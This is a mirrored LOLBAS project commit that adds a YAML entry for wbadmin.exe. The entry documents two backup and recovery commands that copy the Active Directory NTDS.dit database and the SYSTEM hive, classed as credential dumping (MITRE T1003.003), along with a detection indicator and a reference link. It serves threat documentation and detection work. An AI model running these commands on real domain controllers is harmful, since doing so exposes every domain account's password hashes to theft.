mirror of
				https://github.com/LOLBAS-Project/LOLBAS
				synced 2025-10-25 23:05:58 +02:00 
			
		
		
		
	Create wbadmin (#364)
Co-authored-by: Wietze <wietze@users.noreply.github.com>
This commit is contained in:
		
							
								
								
									
										26
									
								
								yml/OSBinaries/Wbadmin.yml
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										26
									
								
								yml/OSBinaries/Wbadmin.yml
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,26 @@ | ||||
| --- | ||||
| Name: wbadmin.exe | ||||
| Description: Windows Backup Administration utility | ||||
| Author: Chris Eastwood | ||||
| Created: 2024-04-05 | ||||
| Commands: | ||||
|   - Command: wbadmin start backup -backupTarget:C:\temp\ -include:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -quiet | ||||
|     Description: Extract NTDS.dit and SYSTEM hive into backup virtual hard drive file (.vhdx) | ||||
|     Usecase: Snapshoting of Active Directory NTDS.dit database | ||||
|     Category: Dump | ||||
|     Privileges: Administrator, Backup Operators, SeBackupPrivilege | ||||
|     MitreID: T1003.003 | ||||
|     OperatingSystem: Windows Server | ||||
|   - Command: wbadmin start recovery -version:<VERSIONIDENTIFIER> -recoverytarget:C:\temp -itemtype:file -items:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -notRestoreAcl -quiet | ||||
|     Description: Restore a version of NTDS.dit and SYSTEM hive into file path. The command `wbadmin get versions` can be used to find version identifiers. | ||||
|     Usecase: Dumping of Active Directory NTDS.dit database | ||||
|     Category: Dump | ||||
|     Privileges: Administrator, Backup Operators, SeBackupPrivilege | ||||
|     MitreID: T1003.003 | ||||
|     OperatingSystem: Windows Server | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\wbadmin.exe | ||||
| Detection: | ||||
|   - IOC: wbadmin.exe command lines containing "NTDS" or "NTDS.dit" | ||||
| Resources: | ||||
|   - Link: https://medium.com/r3d-buck3t/windows-privesc-with-sebackupprivilege-65d2cd1eb960 | ||||
		Reference in New Issue
	
	Block a user